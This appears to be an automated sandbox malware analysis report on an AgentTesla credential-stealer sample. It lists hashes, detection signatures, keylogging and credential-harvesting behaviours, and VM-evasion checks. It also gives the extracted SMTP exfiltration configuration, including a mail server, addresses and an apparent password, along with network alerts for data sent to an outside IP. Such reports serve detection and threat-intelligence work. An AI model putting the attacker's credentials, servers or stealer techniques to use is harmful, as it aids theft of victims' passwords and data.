Loading ...

Play interactive tourEdit tour

Analysis Report 6Rn5G1VWPB

Overview

General Information

Sample Name:6Rn5G1VWPB (renamed file extension from none to exe)
Analysis ID:412365
MD5:c12fea2da39e5173fa674ab5e22a928f
SHA1:ef3754b85ecd9f789bc9bbf8a8c6b36be41cc996
SHA256:19f2d4a6fe01ce9e0bc8362933e41f0d707df28bf9ab662db7dc7504aef3845a
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • 6Rn5G1VWPB.exe (PID: 6004 cmdline: 'C:\Users\user\Desktop\6Rn5G1VWPB.exe' MD5: C12FEA2DA39E5173FA674AB5E22A928F)
    • 6Rn5G1VWPB.exe (PID: 6488 cmdline: C:\Users\user\Desktop\6Rn5G1VWPB.exe MD5: C12FEA2DA39E5173FA674AB5E22A928F)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "info@garciadelacruz.comsc9v6b2nmail.garciadelacruz.comwilliamslucy570@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.6Rn5G1VWPB.exe.3b28798.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.6Rn5G1VWPB.exe.3b28798.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                2.2.6Rn5G1VWPB.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  2.2.6Rn5G1VWPB.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.6Rn5G1VWPB.exe.3b28798.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "info@garciadelacruz.comsc9v6b2nmail.garciadelacruz.comwilliamslucy570@gmail.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 6Rn5G1VWPB.exeVirustotal: Detection: 27%Perma Link
                      Machine Learning detection for sampleShow sources
                      Source: 6Rn5G1VWPB.exeJoe Sandbox ML: detected
                      Source: 2.2.6Rn5G1VWPB.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6Rn5G1VWPB.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: 6Rn5G1VWPB.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ZjzglgzLZb\src\obj\Debug\NullableMarshaler.pdb source: 6Rn5G1VWPB.exe
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_0B3CA958

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49765 -> 86.109.178.195:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49766 -> 86.109.178.195:587
                      Source: global trafficTCP traffic: 192.168.2.4:49765 -> 86.109.178.195:587
                      Source: Joe Sandbox ViewASN Name: ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ES ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ES
                      Source: global trafficTCP traffic: 192.168.2.4:49765 -> 86.109.178.195:587
                      Source: unknownDNS traffic detected: queries for: mail.garciadelacruz.com
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpString found in binary or memory: http://EPtbzE.com
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmp, 6Rn5G1VWPB.exe, 00000002.00000002.915918195.000000000306D000.00000004.00000001.sdmpString found in binary or memory: http://ThqqlGVRjff9puHH.com
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: http://checkip.dyndns.org/
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.915860392.000000000305E000.00000004.00000001.sdmpString found in binary or memory: http://mail.garciadelacruz.com
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657132516.0000000002A71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: http://servermanager.miixit.org/
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: http://servermanager.miixit.org/E
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: http://servermanager.miixit.org/downloads/
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: http://servermanager.miixit.org/hits/hit_index.php?k=
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: http://servermanager.miixit.org/hits/hit_index.php?k=1
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: http://servermanager.miixit.org/index_ru.html
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: http://servermanager.miixit.org/index_ru.htmlk
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: http://servermanager.miixit.org/report/reporter_index.php?name=
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                      Source: 6Rn5G1VWPB.exeString found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmp, 6Rn5G1VWPB.exe, 00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\6Rn5G1VWPB.exeJump to behavior
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.656695118.0000000000DBA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 2.2.6Rn5G1VWPB.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b93583AFAu002d3600u002d4429u002dB88Cu002dB97018CCE186u007d/u00396526966u002dBC46u002d4C39u002dA45Du002d13BC48BBFB17.csLarge array initialization: .cctor: array initializer size 11984
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 0_2_00627DA20_2_00627DA2
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 0_2_0107C2B00_2_0107C2B0
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 0_2_010799680_2_01079968
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 0_2_0B3C83300_2_0B3C8330
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 0_2_0B3C83400_2_0B3C8340
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 0_2_0B3C41000_2_0B3C4100
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 0_2_0B3C31600_2_0B3C3160
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_007D7DA22_2_007D7DA2
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010C75602_2_010C7560
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010CBDB82_2_010CBDB8
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010C00402_2_010C0040
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010C5B382_2_010C5B38
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010C37702_2_010C3770
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010C80102_2_010C8010
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010CD8782_2_010CD878
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010D61782_2_010D6178
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010D68B02_2_010D68B0
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010D5B402_2_010D5B40
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010D36982_2_010D3698
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010E5D682_2_010E5D68
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010E09C62_2_010E09C6
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010EA1C42_2_010EA1C4
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010EAC382_2_010EAC38
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010E90982_2_010E9098
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010ECF802_2_010ECF80
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010EE2102_2_010EE210
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010E70B82_2_010E70B8
                      Source: 6Rn5G1VWPB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.656374839.0000000000726000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNullableMarshaler.exeP vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.660770620.0000000005E00000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657132516.0000000002A71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657132516.0000000002A71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamermQUBCospdbOYhbGMUBMmNJghaERaRjQZrS.exe4 vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.656695118.0000000000DBA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamermQUBCospdbOYhbGMUBMmNJghaERaRjQZrS.exe4 vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.914452498.0000000001230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.914284247.00000000010B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.913959685.0000000000FAA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.913136418.00000000008D6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNullableMarshaler.exeP vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.913204426.0000000000CF8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exeBinary or memory string: OriginalFilenameNullableMarshaler.exeP vs 6Rn5G1VWPB.exe
                      Source: 6Rn5G1VWPB.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: 6Rn5G1VWPB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 2.2.6Rn5G1VWPB.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.2.6Rn5G1VWPB.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6Rn5G1VWPB.exe.logJump to behavior
                      Source: 6Rn5G1VWPB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                      Source: 6Rn5G1VWPB.exeVirustotal: Detection: 27%
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile read: C:\Users\user\Desktop\6Rn5G1VWPB.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\6Rn5G1VWPB.exe 'C:\Users\user\Desktop\6Rn5G1VWPB.exe'
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess created: C:\Users\user\Desktop\6Rn5G1VWPB.exe C:\Users\user\Desktop\6Rn5G1VWPB.exe
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess created: C:\Users\user\Desktop\6Rn5G1VWPB.exe C:\Users\user\Desktop\6Rn5G1VWPB.exeJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: 6Rn5G1VWPB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 6Rn5G1VWPB.exeStatic file information: File size 1162752 > 1048576
                      Source: 6Rn5G1VWPB.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: 6Rn5G1VWPB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ZjzglgzLZb\src\obj\Debug\NullableMarshaler.pdb source: 6Rn5G1VWPB.exe
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 0_2_010704D0 push C0330101h; ret 0_2_010704E2
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010DB597 push edi; retn 0000h2_2_010DB599
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.89681221538
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
